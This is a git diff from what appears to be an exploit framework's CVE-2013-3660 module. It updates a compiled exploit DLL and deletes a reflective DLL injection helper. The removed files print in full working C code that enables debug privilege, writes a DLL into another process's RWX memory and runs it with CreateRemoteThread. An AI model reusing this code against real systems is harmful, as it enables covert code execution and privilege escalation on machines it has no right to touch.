diff --git a/data/exploits/cve-2013-3660/exploit.dll b/data/exploits/cve-2013-3660/exploit.dll
index 8b7ae21348..706e1e1d24 100755
Binary files a/data/exploits/cve-2013-3660/exploit.dll and b/data/exploits/cve-2013-3660/exploit.dll differ
diff --git a/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj b/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj
index d01f1db543..1aae9cb3e1 100755
--- a/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj
+++ b/external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj
@@ -107,6 +107,7 @@
$(SolutionDir)$(Configuration)\$(Configuration)\false
+ exploitfalse
diff --git a/external/source/exploits/cve-2013-3660/dll/src/ReflectiveDll.c b/external/source/exploits/cve-2013-3660/dll/src/ReflectiveDll.c
index c8912a9e9d..29a70cc393 100755
--- a/external/source/exploits/cve-2013-3660/dll/src/ReflectiveDll.c
+++ b/external/source/exploits/cve-2013-3660/dll/src/ReflectiveDll.c
@@ -431,11 +431,6 @@ typedef __success(return >= 0) LONG NTSTATUS;
typedef NTSTATUS *PNTSTATUS;
#endif
-#ifndef PAGE_SIZE
-# define PAGE_SIZE 0x1000
-#endif
-
-
// Search the specified data structure for a member with CurrentValue.
BOOL FindAndReplaceMember(PDWORD Structure,
DWORD CurrentValue,
diff --git a/external/source/exploits/cve-2013-3660/inject/inject.sln b/external/source/exploits/cve-2013-3660/inject/inject.sln
deleted file mode 100755
index e6c711e846..0000000000
--- a/external/source/exploits/cve-2013-3660/inject/inject.sln
+++ /dev/null
@@ -1,20 +0,0 @@
-
-Microsoft Visual Studio Solution File, Format Version 10.00
-# Visual C++ Express 2008
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "inject", "inject.vcproj", "{EEF3FD41-05D8-4A07-8434-EF5D34D76335}"
-EndProject
-Global
- GlobalSection(SolutionConfigurationPlatforms) = preSolution
- Debug|Win32 = Debug|Win32
- Release|Win32 = Release|Win32
- EndGlobalSection
- GlobalSection(ProjectConfigurationPlatforms) = postSolution
- {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|Win32.ActiveCfg = Release|Win32
- {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|Win32.Build.0 = Release|Win32
- {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|Win32.ActiveCfg = Release|Win32
- {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|Win32.Build.0 = Release|Win32
- EndGlobalSection
- GlobalSection(SolutionProperties) = preSolution
- HideSolutionNode = FALSE
- EndGlobalSection
-EndGlobal
diff --git a/external/source/exploits/cve-2013-3660/inject/inject.vcproj b/external/source/exploits/cve-2013-3660/inject/inject.vcproj
deleted file mode 100755
index 87312eb71c..0000000000
--- a/external/source/exploits/cve-2013-3660/inject/inject.vcproj
+++ /dev/null
@@ -1,360 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
diff --git a/external/source/exploits/cve-2013-3660/inject/inject.vcxproj b/external/source/exploits/cve-2013-3660/inject/inject.vcxproj
deleted file mode 100755
index 683ccc4aa7..0000000000
--- a/external/source/exploits/cve-2013-3660/inject/inject.vcxproj
+++ /dev/null
@@ -1,258 +0,0 @@
-
-
-
-
- Debug
- ARM
-
-
- Debug
- Win32
-
-
- Debug
- x64
-
-
- Release
- ARM
-
-
- Release
- Win32
-
-
- Release
- x64
-
-
-
- {EEF3FD41-05D8-4A07-8434-EF5D34D76335}
- inject
- Win32Proj
-
-
-
- Application
- v110
- MultiByte
- true
-
-
- Application
- v110
- MultiByte
- true
-
-
- Application
- v110
- Unicode
-
-
- Application
- v110
- Unicode
-
-
- Application
- v110
- MultiByte
- true
-
-
- Application
- v110
- Unicode
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- <_ProjectFileVersion>11.0.50727.1
-
-
- $(SolutionDir)$(Configuration)\
- $(Configuration)\
- true
-
-
- true
-
-
- $(SolutionDir)$(Platform)\$(Configuration)\
- $(Platform)\$(Configuration)\
- true
-
-
- $(SolutionDir)$(Configuration)\
- $(Configuration)\
- false
-
-
- false
-
-
- $(SolutionDir)$(Platform)\$(Configuration)\
- $(Platform)\$(Configuration)\
- false
-
-
-
- Disabled
- WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
- true
- EnableFastChecks
- MultiThreadedDebugDLL
-
- Level3
- EditAndContinue
-
-
- true
- Console
- MachineX86
-
-
-
-
- Disabled
- WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
- true
- EnableFastChecks
- MultiThreadedDebugDLL
-
-
- Level3
- EditAndContinue
-
-
- true
- Console
-
-
-
-
- X64
-
-
- Disabled
- WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
- true
- EnableFastChecks
- MultiThreadedDebugDLL
-
- Level3
- ProgramDatabase
-
-
- true
- Console
- MachineX64
-
-
-
-
- MaxSpeed
- true
- WIN32;NDEBUG;_CONSOLE;WIN_X86;%(PreprocessorDefinitions)
- MultiThreaded
- true
-
- Level3
- ProgramDatabase
-
-
- true
- Console
- true
- true
- MachineX86
-
-
- copy ..\Release\inject.exe ..\bin\
-
-
-
-
- MaxSpeed
- true
- WIN32;NDEBUG;_CONSOLE;WIN_ARM;%(PreprocessorDefinitions)
- MultiThreaded
- true
-
-
- Level3
- ProgramDatabase
-
-
- true
- Console
- true
- true
- $(OutDir)inject.arm.exe
- %(AdditionalDependencies)
-
-
- copy ..\ARM\Release\inject.arm.exe ..\bin\
-
-
-
-
- X64
-
-
- MaxSpeed
- true
- WIN64;NDEBUG;_CONSOLE;_WIN64;WIN_X64;%(PreprocessorDefinitions)
- MultiThreaded
- true
-
- Level3
- ProgramDatabase
-
-
- $(OutDir)inject.x64.exe
- true
- Console
- true
- true
- MachineX64
-
-
- copy ..\x64\Release\inject.x64.exe ..\bin\
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/external/source/exploits/cve-2013-3660/inject/inject.vcxproj.filters b/external/source/exploits/cve-2013-3660/inject/inject.vcxproj.filters
deleted file mode 100755
index 418896d025..0000000000
--- a/external/source/exploits/cve-2013-3660/inject/inject.vcxproj.filters
+++ /dev/null
@@ -1,35 +0,0 @@
-
-
-
-
- {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
- cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
-
-
- {93995380-89BD-4b04-88EB-625FBE52EBFB}
- h;hpp;hxx;hm;inl;inc;xsd
-
-
-
-
- Source Files
-
-
- Source Files
-
-
- Source Files
-
-
-
-
- Header Files
-
-
- Header Files
-
-
- Header Files
-
-
-
\ No newline at end of file
diff --git a/external/source/exploits/cve-2013-3660/inject/src/GetProcAddressR.c b/external/source/exploits/cve-2013-3660/inject/src/GetProcAddressR.c
deleted file mode 100755
index ef96dcbfbe..0000000000
--- a/external/source/exploits/cve-2013-3660/inject/src/GetProcAddressR.c
+++ /dev/null
@@ -1,116 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without modification, are permitted
-// provided that the following conditions are met:
-//
-// * Redistributions of source code must retain the above copyright notice, this list of
-// conditions and the following disclaimer.
-//
-// * Redistributions in binary form must reproduce the above copyright notice, this list of
-// conditions and the following disclaimer in the documentation and/or other materials provided
-// with the distribution.
-//
-// * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#include "GetProcAddressR.h"
-//===============================================================================================//
-// We implement a minimal GetProcAddress to avoid using the native kernel32!GetProcAddress which
-// wont be able to resolve exported addresses in reflectivly loaded librarys.
-FARPROC WINAPI GetProcAddressR( HANDLE hModule, LPCSTR lpProcName )
-{
- UINT_PTR uiLibraryAddress = 0;
- FARPROC fpResult = NULL;
-
- if( hModule == NULL )
- return NULL;
-
- // a module handle is really its base address
- uiLibraryAddress = (UINT_PTR)hModule;
-
- __try
- {
- UINT_PTR uiAddressArray = 0;
- UINT_PTR uiNameArray = 0;
- UINT_PTR uiNameOrdinals = 0;
- PIMAGE_NT_HEADERS pNtHeaders = NULL;
- PIMAGE_DATA_DIRECTORY pDataDirectory = NULL;
- PIMAGE_EXPORT_DIRECTORY pExportDirectory = NULL;
-
- // get the VA of the modules NT Header
- pNtHeaders = (PIMAGE_NT_HEADERS)(uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew);
-
- pDataDirectory = (PIMAGE_DATA_DIRECTORY)&pNtHeaders->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
-
- // get the VA of the export directory
- pExportDirectory = (PIMAGE_EXPORT_DIRECTORY)( uiLibraryAddress + pDataDirectory->VirtualAddress );
-
- // get the VA for the array of addresses
- uiAddressArray = ( uiLibraryAddress + pExportDirectory->AddressOfFunctions );
-
- // get the VA for the array of name pointers
- uiNameArray = ( uiLibraryAddress + pExportDirectory->AddressOfNames );
-
- // get the VA for the array of name ordinals
- uiNameOrdinals = ( uiLibraryAddress + pExportDirectory->AddressOfNameOrdinals );
-
- // test if we are importing by name or by ordinal...
- if( ((DWORD)lpProcName & 0xFFFF0000 ) == 0x00000000 )
- {
- // import by ordinal...
-
- // use the import ordinal (- export ordinal base) as an index into the array of addresses
- uiAddressArray += ( ( IMAGE_ORDINAL( (DWORD)lpProcName ) - pExportDirectory->Base ) * sizeof(DWORD) );
-
- // resolve the address for this imported function
- fpResult = (FARPROC)( uiLibraryAddress + DEREF_32(uiAddressArray) );
- }
- else
- {
- // import by name...
- DWORD dwCounter = pExportDirectory->NumberOfNames;
- while( dwCounter-- )
- {
- char * cpExportedFunctionName = (char *)(uiLibraryAddress + DEREF_32( uiNameArray ));
-
- // test if we have a match...
- if( strcmp( cpExportedFunctionName, lpProcName ) == 0 )
- {
- // use the functions name ordinal as an index into the array of name pointers
- uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
-
- // calculate the virtual address for the function
- fpResult = (FARPROC)(uiLibraryAddress + DEREF_32( uiAddressArray ));
-
- // finish...
- break;
- }
-
- // get the next exported function name
- uiNameArray += sizeof(DWORD);
-
- // get the next exported function name ordinal
- uiNameOrdinals += sizeof(WORD);
- }
- }
- }
- __except( EXCEPTION_EXECUTE_HANDLER )
- {
- fpResult = NULL;
- }
-
- return fpResult;
-}
-//===============================================================================================//
\ No newline at end of file
diff --git a/external/source/exploits/cve-2013-3660/inject/src/GetProcAddressR.h b/external/source/exploits/cve-2013-3660/inject/src/GetProcAddressR.h
deleted file mode 100755
index 4f5170c31d..0000000000
--- a/external/source/exploits/cve-2013-3660/inject/src/GetProcAddressR.h
+++ /dev/null
@@ -1,36 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without modification, are permitted
-// provided that the following conditions are met:
-//
-// * Redistributions of source code must retain the above copyright notice, this list of
-// conditions and the following disclaimer.
-//
-// * Redistributions in binary form must reproduce the above copyright notice, this list of
-// conditions and the following disclaimer in the documentation and/or other materials provided
-// with the distribution.
-//
-// * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#ifndef _REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H
-#define _REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H
-//===============================================================================================//
-#include "ReflectiveDLLInjection.h"
-
-FARPROC WINAPI GetProcAddressR( HANDLE hModule, LPCSTR lpProcName );
-//===============================================================================================//
-#endif
-//===============================================================================================//
diff --git a/external/source/exploits/cve-2013-3660/inject/src/Inject.c b/external/source/exploits/cve-2013-3660/inject/src/Inject.c
deleted file mode 100755
index a7f4a2fee3..0000000000
--- a/external/source/exploits/cve-2013-3660/inject/src/Inject.c
+++ /dev/null
@@ -1,120 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without modification, are permitted
-// provided that the following conditions are met:
-//
-// * Redistributions of source code must retain the above copyright notice, this list of
-// conditions and the following disclaimer.
-//
-// * Redistributions in binary form must reproduce the above copyright notice, this list of
-// conditions and the following disclaimer in the documentation and/or other materials provided
-// with the distribution.
-//
-// * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#define WIN32_LEAN_AND_MEAN
-#include
-#include
-#include
-#include "LoadLibraryR.h"
-
-#pragma comment(lib,"Advapi32.lib")
-
-#define BREAK_WITH_ERROR( e ) { printf( "[-] %s. Error=%d", e, GetLastError() ); break; }
-
-// Simple app to inject a reflective DLL into a process vis its process ID.
-int main( int argc, char * argv[] )
-{
- HANDLE hFile = NULL;
- HANDLE hModule = NULL;
- HANDLE hProcess = NULL;
- HANDLE hToken = NULL;
- LPVOID lpBuffer = NULL;
- DWORD dwLength = 0;
- DWORD dwBytesRead = 0;
- DWORD dwProcessId = 0;
- TOKEN_PRIVILEGES priv = {0};
-
-#ifdef WIN_X64
- char * cpDllFile = "reflective_dll.x64.dll";
-#else
-#ifdef WIN_X86
- char * cpDllFile = "reflective_dll.dll";
-#else WIN_ARM
- char * cpDllFile = "reflective_dll.arm.dll";
-#endif
-#endif
-
- do
- {
- // Usage: inject.exe [pid] [dll_file]
-
- if( argc == 1 )
- dwProcessId = GetCurrentProcessId();
- else
- dwProcessId = atoi( argv[1] );
-
- if( argc >= 3 )
- cpDllFile = argv[2];
-
- hFile = CreateFileA( cpDllFile, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL );
- if( hFile == INVALID_HANDLE_VALUE )
- BREAK_WITH_ERROR( "Failed to open the DLL file" );
-
- dwLength = GetFileSize( hFile, NULL );
- if( dwLength == INVALID_FILE_SIZE || dwLength == 0 )
- BREAK_WITH_ERROR( "Failed to get the DLL file size" );
-
- lpBuffer = HeapAlloc( GetProcessHeap(), 0, dwLength );
- if( !lpBuffer )
- BREAK_WITH_ERROR( "Failed to get the DLL file size" );
-
- if( ReadFile( hFile, lpBuffer, dwLength, &dwBytesRead, NULL ) == FALSE )
- BREAK_WITH_ERROR( "Failed to alloc a buffer!" );
-
- if( OpenProcessToken( GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken ) )
- {
- priv.PrivilegeCount = 1;
- priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
-
- if( LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &priv.Privileges[0].Luid ) )
- AdjustTokenPrivileges( hToken, FALSE, &priv, 0, NULL, NULL );
-
- CloseHandle( hToken );
- }
-
- hProcess = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, dwProcessId );
- if( !hProcess )
- BREAK_WITH_ERROR( "Failed to open the target process" );
-
- hModule = LoadRemoteLibraryR( hProcess, lpBuffer, dwLength, NULL );
- if( !hModule )
- BREAK_WITH_ERROR( "Failed to inject the DLL" );
-
- printf( "[+] Injected the '%s' DLL into process %d.", cpDllFile, dwProcessId );
-
- WaitForSingleObject( hModule, -1 );
-
- } while( 0 );
-
- if( lpBuffer )
- HeapFree( GetProcessHeap(), 0, lpBuffer );
-
- if( hProcess )
- CloseHandle( hProcess );
-
- return 0;
-}
\ No newline at end of file
diff --git a/external/source/exploits/cve-2013-3660/inject/src/LoadLibraryR.c b/external/source/exploits/cve-2013-3660/inject/src/LoadLibraryR.c
deleted file mode 100755
index db73903ff7..0000000000
--- a/external/source/exploits/cve-2013-3660/inject/src/LoadLibraryR.c
+++ /dev/null
@@ -1,234 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without modification, are permitted
-// provided that the following conditions are met:
-//
-// * Redistributions of source code must retain the above copyright notice, this list of
-// conditions and the following disclaimer.
-//
-// * Redistributions in binary form must reproduce the above copyright notice, this list of
-// conditions and the following disclaimer in the documentation and/or other materials provided
-// with the distribution.
-//
-// * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#include "LoadLibraryR.h"
-#include
-//===============================================================================================//
-DWORD Rva2Offset( DWORD dwRva, UINT_PTR uiBaseAddress )
-{
- WORD wIndex = 0;
- PIMAGE_SECTION_HEADER pSectionHeader = NULL;
- PIMAGE_NT_HEADERS pNtHeaders = NULL;
-
- pNtHeaders = (PIMAGE_NT_HEADERS)(uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew);
-
- pSectionHeader = (PIMAGE_SECTION_HEADER)((UINT_PTR)(&pNtHeaders->OptionalHeader) + pNtHeaders->FileHeader.SizeOfOptionalHeader);
-
- if( dwRva < pSectionHeader[0].PointerToRawData )
- return dwRva;
-
- for( wIndex=0 ; wIndex < pNtHeaders->FileHeader.NumberOfSections ; wIndex++ )
- {
- if( dwRva >= pSectionHeader[wIndex].VirtualAddress && dwRva < (pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].SizeOfRawData) )
- return ( dwRva - pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].PointerToRawData );
- }
-
- return 0;
-}
-//===============================================================================================//
-DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer )
-{
- UINT_PTR uiBaseAddress = 0;
- UINT_PTR uiExportDir = 0;
- UINT_PTR uiNameArray = 0;
- UINT_PTR uiAddressArray = 0;
- UINT_PTR uiNameOrdinals = 0;
- DWORD dwCounter = 0;
-#ifdef WIN_X64
- DWORD dwCompiledArch = 2;
-#else
- // This will catch Win32 and WinRT.
- DWORD dwCompiledArch = 1;
-#endif
-
- uiBaseAddress = (UINT_PTR)lpReflectiveDllBuffer;
-
- // get the File Offset of the modules NT Header
- uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
-
- // currenlty we can only process a PE file which is the same type as the one this fuction has
- // been compiled as, due to various offset in the PE structures being defined at compile time.
- if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x010B ) // PE32
- {
- if( dwCompiledArch != 1 )
- return 0;
- }
- else if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x020B ) // PE64
- {
- if( dwCompiledArch != 2 )
- return 0;
- }
- else
- {
- return 0;
- }
-
- // uiNameArray = the address of the modules export directory entry
- uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
-
- // get the File Offset of the export directory
- uiExportDir = uiBaseAddress + Rva2Offset( ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress, uiBaseAddress );
-
- // get the File Offset for the array of name pointers
- uiNameArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames, uiBaseAddress );
-
- // get the File Offset for the array of addresses
- uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );
-
- // get the File Offset for the array of name ordinals
- uiNameOrdinals = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals, uiBaseAddress );
-
- // get a counter for the number of exported functions...
- dwCounter = ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->NumberOfNames;
-
- // loop through all the exported functions to find the ReflectiveLoader
- while( dwCounter-- )
- {
- char * cpExportedFunctionName = (char *)(uiBaseAddress + Rva2Offset( DEREF_32( uiNameArray ), uiBaseAddress ));
-
- if( strstr( cpExportedFunctionName, "ReflectiveLoader" ) != NULL )
- {
- // get the File Offset for the array of addresses
- uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );
-
- // use the functions name ordinal as an index into the array of name pointers
- uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
-
- // return the File Offset to the ReflectiveLoader() functions code...
- return Rva2Offset( DEREF_32( uiAddressArray ), uiBaseAddress );
- }
- // get the next exported function name
- uiNameArray += sizeof(DWORD);
-
- // get the next exported function name ordinal
- uiNameOrdinals += sizeof(WORD);
- }
-
- return 0;
-}
-//===============================================================================================//
-// Loads a DLL image from memory via its exported ReflectiveLoader function
-HMODULE WINAPI LoadLibraryR( LPVOID lpBuffer, DWORD dwLength )
-{
- HMODULE hResult = NULL;
- DWORD dwReflectiveLoaderOffset = 0;
- DWORD dwOldProtect1 = 0;
- DWORD dwOldProtect2 = 0;
- REFLECTIVELOADER pReflectiveLoader = NULL;
- DLLMAIN pDllMain = NULL;
-
- if( lpBuffer == NULL || dwLength == 0 )
- return NULL;
-
- __try
- {
- // check if the library has a ReflectiveLoader...
- dwReflectiveLoaderOffset = GetReflectiveLoaderOffset( lpBuffer );
- if( dwReflectiveLoaderOffset != 0 )
- {
- pReflectiveLoader = (REFLECTIVELOADER)((UINT_PTR)lpBuffer + dwReflectiveLoaderOffset);
-
- // we must VirtualProtect the buffer to RWX so we can execute the ReflectiveLoader...
- // this assumes lpBuffer is the base address of the region of pages and dwLength the size of the region
- if( VirtualProtect( lpBuffer, dwLength, PAGE_EXECUTE_READWRITE, &dwOldProtect1 ) )
- {
- // call the librarys ReflectiveLoader...
- pDllMain = (DLLMAIN)pReflectiveLoader();
- if( pDllMain != NULL )
- {
- // call the loaded librarys DllMain to get its HMODULE
- if( !pDllMain( NULL, DLL_QUERY_HMODULE, &hResult ) )
- hResult = NULL;
- }
- // revert to the previous protection flags...
- VirtualProtect( lpBuffer, dwLength, dwOldProtect1, &dwOldProtect2 );
- }
- }
- }
- __except( EXCEPTION_EXECUTE_HANDLER )
- {
- hResult = NULL;
- }
-
- return hResult;
-}
-//===============================================================================================//
-// Loads a PE image from memory into the address space of a host process via the image's exported ReflectiveLoader function
-// Note: You must compile whatever you are injecting with REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
-// defined in order to use the correct RDI prototypes.
-// Note: The hProcess handle must have these access rights: PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
-// PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ
-// Note: If you are passing in an lpParameter value, if it is a pointer, remember it is for a different address space.
-// Note: This function currently cant inject accross architectures, but only to architectures which are the
-// same as the arch this function is compiled as, e.g. x86->x86 and x64->x64 but not x64->x86 or x86->x64.
-HANDLE WINAPI LoadRemoteLibraryR( HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter )
-{
- BOOL bSuccess = FALSE;
- LPVOID lpRemoteLibraryBuffer = NULL;
- LPTHREAD_START_ROUTINE lpReflectiveLoader = NULL;
- HANDLE hThread = NULL;
- DWORD dwReflectiveLoaderOffset = 0;
- DWORD dwThreadId = 0;
-
- __try
- {
- do
- {
- if( !hProcess || !lpBuffer || !dwLength )
- break;
-
- // check if the library has a ReflectiveLoader...
- dwReflectiveLoaderOffset = GetReflectiveLoaderOffset( lpBuffer );
- if( !dwReflectiveLoaderOffset )
- break;
-
- // alloc memory (RWX) in the host process for the image...
- lpRemoteLibraryBuffer = VirtualAllocEx( hProcess, NULL, dwLength, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
- if( !lpRemoteLibraryBuffer )
- break;
-
- // write the image into the host process...
- if( !WriteProcessMemory( hProcess, lpRemoteLibraryBuffer, lpBuffer, dwLength, NULL ) )
- break;
-
- // add the offset to ReflectiveLoader() to the remote library address...
- lpReflectiveLoader = (LPTHREAD_START_ROUTINE)( (ULONG_PTR)lpRemoteLibraryBuffer + dwReflectiveLoaderOffset );
-
- // create a remote thread in the host process to call the ReflectiveLoader!
- hThread = CreateRemoteThread( hProcess, NULL, 1024*1024, lpReflectiveLoader, lpParameter, (DWORD)NULL, &dwThreadId );
-
- } while( 0 );
-
- }
- __except( EXCEPTION_EXECUTE_HANDLER )
- {
- hThread = NULL;
- }
-
- return hThread;
-}
-//===============================================================================================//
diff --git a/external/source/exploits/cve-2013-3660/inject/src/LoadLibraryR.h b/external/source/exploits/cve-2013-3660/inject/src/LoadLibraryR.h
deleted file mode 100755
index d8419858a9..0000000000
--- a/external/source/exploits/cve-2013-3660/inject/src/LoadLibraryR.h
+++ /dev/null
@@ -1,41 +0,0 @@
-//===============================================================================================//
